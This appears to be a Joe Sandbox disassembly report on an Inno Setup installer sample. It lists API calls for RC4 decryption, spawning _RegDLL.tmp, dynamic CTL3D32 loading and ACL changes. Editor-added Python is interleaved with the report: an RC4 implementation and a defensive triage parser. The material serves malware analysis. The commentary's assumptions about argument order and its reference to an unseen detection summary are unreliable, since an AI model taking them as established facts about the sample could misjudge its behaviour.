                                                                          • Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                          • Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
                                                                          • Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                          • Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
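The two records above are calls into `ArcFourCrypt` in the `_ISCRYPT` module; together with the `_isetup\_RegDLL.tmp` strings further down, that identifies the sample as an Inno Setup installer, whose ISCrypt component applies RC4 (ArcFour) to embedded files when the installer is password-protected. The report shows only a four-argument call and, in the second record, a length of 0x3E8 (1000) bytes; the key and its derivation are not on the page. The following added example (the editor's own code, not from the report or from Inno Setup) implements RC4 as a keyed context whose `crypt` method continues the keystream across calls, which is the assumed meaning of the context/in/out/length parameters shown; it is checked against the published RC4 test vectors. RC4 is obsolete as a cipher and appears here only because that is what the installer uses.

```python
"""Added example: RC4 (ArcFour) as a streaming context, the primitive behind
the ArcFourCrypt calls in the listing above. Editor's code, not the sample's."""


class ArcFour:
    """Keyed RC4 state. Repeated crypt() calls continue the same keystream,
    mirroring a context struct passed to each ArcFourCrypt(ctx, in, out, len)
    call (parameter layout assumed from the four-argument call on this page)."""

    def __init__(self, key: bytes):
        if not 1 <= len(key) <= 256:
            raise ValueError("RC4 key must be 1..256 bytes")
        # Key-scheduling algorithm: permute the identity table under the key.
        s = list(range(256))
        j = 0
        for i in range(256):
            j = (j + s[i] + key[i % len(key)]) & 0xFF
            s[i], s[j] = s[j], s[i]
        self._s = s
        self._i = 0
        self._j = 0

    def crypt(self, data: bytes) -> bytes:
        """Pseudo-random generation: XOR data with the next len(data)
        keystream bytes. Encryption and decryption are the same operation."""
        s, i, j = self._s, self._i, self._j
        out = bytearray(len(data))
        for n, byte in enumerate(data):
            i = (i + 1) & 0xFF
            j = (j + s[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
            out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
        self._i, self._j = i, j
        return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    """One-shot helper: fresh context, whole buffer."""
    return ArcFour(key).crypt(data)


def streamed_equals_oneshot(key: bytes, data: bytes, split: int) -> bool:
    """Show that chunked calls on one context reproduce the one-shot output,
    which is why a per-context state (not just the key) has to be tracked
    when reconstructing a multi-call ArcFourCrypt sequence from a trace."""
    ctx = ArcFour(key)
    chunked = ctx.crypt(data[:split]) + ctx.crypt(data[split:])
    return chunked == rc4(key, data)


if __name__ == "__main__":
    # Known-answer vector: key "Key", plaintext "Plaintext" -> bbf316e8d940af0ad3
    print(rc4(b"Key", b"Plaintext").hex())
```

The known-answer vectors (`Key`/`Plaintext`, `Wiki`/`pedia`, `Secret`/`Attack at dawn`) are the standard public RC4 test vectors, not data taken from this sample.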
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3304844376.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.3304826159.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                          • Associated: 00000001.00000002.3304861099.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3304844376.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.3304826159.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                          • Associated: 00000001.00000002.3304861099.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                          • CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
                                                                          • CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          • CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
                                                                          • GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
                                                                          • UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
                                                                          • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
                                                                          • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                          • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                          • API String ID: 4012871263-351310198
                                                                          • Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                          • Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
                                                                          • Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
                                                                          • Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69
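The record above is the routine that spawns `_RegDLL.tmp`: it creates a named mutex and a file mapping, maps the view, calls `CreateProcessA`, waits on the child and then unmaps and closes everything, so the child receives its work through shared memory rather than the command line. Reading these "APIs" listings by eye across hundreds of functions is slow, so the following added example (the editor's own triage helper, not part of the report or of Joe Sandbox) parses records in the page's own layout and extracts what is checked first: names resolved through `LoadLibrary`/`GetProcAddress` (as in the `CTL3D32.DLL` record below), the `dwCreationFlags` passed to `CreateProcess`, whether a file mapping and a process creation share one function, and calls listed only by address (entries such as `73A0A570.USER32` in the GDI routine further down, where the export name was not resolved). The sample input is constructed from calls copied off this page with trailing stack values trimmed and merged into two records; the assumption that Joe Sandbox lists arguments in declaration order, so that the sixth `CreateProcessA` argument is `dwCreationFlags`, is the editor's.

```python
"""Added triage helper for Joe Sandbox per-function "APIs" listings.
Editor's code, not part of the report; argument positions are assumed to
follow the Win32 declaration order."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed excerpt in the report's own layout: calls copied from the
# _RegDLL.tmp, CTL3D32.DLL and GDI records on this page, merged into two records.
SAMPLE = """\
APIs
• CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875), ref: 0045758D
• CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000), ref: 004575EC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000), ref: 00452AFF
• CloseHandle.KERNEL32(00457A8F), ref: 00457710
Memory Dump Source
• Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
APIs
• LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000), ref: 0041F15E
• GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
• GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
• 73A0A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
• FreeLibrary.KERNEL32(00000001), ref: 0041F27F
Strings
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[0-9A-Za-z_]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
ADDRESS_RE = re.compile(r"[0-9A-F]{8}")

# dwCreationFlags bits (Win32 values) worth surfacing in triage.
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    parent: Optional[str] = None   # set for "Part of subcall function" lines

    @property
    def unresolved(self) -> bool:
        # "73A0A570.USER32": only the resolved address is shown, not the export name.
        return ADDRESS_RE.fullmatch(self.name) is not None


def parse_records(text: str) -> List[List[ApiCall]]:
    """Split the listing at each 'APIs' header; any other header ends the record."""
    records: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
        elif stripped and not stripped.startswith("•"):
            current = None
    return records


def decode_creation_flags(arg: str) -> List[str]:
    try:
        value = int(arg, 16)
    except ValueError:       # "?" means the sandbox could not recover the value
        return []
    return [name for bit, name in CREATION_FLAGS.items() if value & bit]


def triage(record: List[ApiCall]) -> Dict[str, object]:
    names = [c.name for c in record]
    loaded = any(n.startswith("LoadLibrary") for n in names)
    dynamic: List[str] = []
    flags: List[str] = []
    for c in record:
        # Second GetProcAddress argument is the export name when it is a literal string.
        if c.name == "GetProcAddress" and loaded and len(c.args) >= 2 \
                and not re.fullmatch(r"[0-9A-F]{8}|\?", c.args[1]):
            dynamic.append(c.args[1])
        if c.name.startswith("CreateProcess") and len(c.args) >= 6:
            flags = decode_creation_flags(c.args[5])   # assumed: 6th arg is dwCreationFlags
    handoff = all(any(n.startswith(p) for n in names)
                  for p in ("CreateFileMapping", "MapViewOfFile", "CreateProcess"))
    return {
        "dynamic_imports": dynamic,
        "creation_flags": flags,
        "shared_memory_handoff": handoff,
        "unresolved_calls": sum(c.unresolved for c in record),
    }


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, triage(rec))
```

On the `_RegDLL.tmp` record this reports `CREATE_DEFAULT_ERROR_MODE` only (no `CREATE_SUSPENDED`, so this particular `CreateProcess` is not the suspended-mode creation the detection summary flags elsewhere) together with the shared-memory handoff; on the second record it lists the `Ctl3d*` exports resolved at run time and counts one address-only call.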
                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                          • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                          • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                          • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                          • API String ID: 2323315520-3614243559
                                                                          • Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                          • Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
                                                                          • Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
                                                                          • Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                          • 73A14C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                          • 73A16180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                          • 73A14C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                          • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                          • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                          • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                          • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                          • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                          • 73A14C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                          • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                          • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                          • 73A08830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                          • 73A022A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                          • 73A14D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                          • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                            • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                          • String ID:
                                                                          • API String ID: 2377543522-0
                                                                          • Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                          • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                          • Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                          • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
                                                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
                                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
                                                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B
                                                                            • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                          • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                          • API String ID: 2000705611-3392794427
                                                                          • Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                          • Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
                                                                          • Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                          • Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                          • API String ID: 1452528299-3112430753
                                                                          • Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                          • Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
                                                                          • Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                          • Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A
                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 0045C2FA
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
                                                                          • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
                                                                          • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
                                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342
                                                                            • Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                          • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                          • API String ID: 59345061-4263478283
                                                                          • Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                          • Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
                                                                          • Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                          • Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9
                                                                          APIs
                                                                          • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                          • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                          • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
